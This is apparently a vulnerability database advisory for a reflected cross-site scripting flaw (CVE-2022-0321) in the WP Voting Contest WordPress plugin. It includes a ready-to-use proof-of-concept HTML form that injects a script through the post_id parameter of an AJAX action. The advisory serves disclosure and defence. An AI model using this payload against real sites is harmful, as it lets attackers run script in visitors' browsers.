Lucene search
Brandon James RoldanWPEX-ID:286B81A0-6F6D-4024-9BBC-6CB373990A7AHistoryFeb 16, 2022 - 12:00 a.m.
WP Voting Contest <= 2.1 - Reflected Cross-Site Scripting
2022-02-1600:00:00
Brandon James Roldan
67
wordpress
voting contest
reflected cross-site scripting
social share icons
security exploit
EPSS
0.001
Percentile
44.3%
The plugin does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpvc_social_share_icons" />
<input type="hidden" name="post_id" value='asd"/><script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
wpvulndb
wpvulndb
WP Voting Contest <= 2.1 - Reflected Cross-Site Scripting
2022-02-16 00:00:00
cve
cve
CVE-2022-0321
2022-03-14 15:15:09
cvelist
cvelist
CVE-2022-0321 WP Voting Contest < 3.0 - Reflected Cross-Site Scripting
2022-03-14 14:41:28
patchstack
patchstack
nvd
nvd
CVE-2022-0321
2022-03-14 15:15:09
prion
prion
Cross site scripting
2022-03-14 15:15:00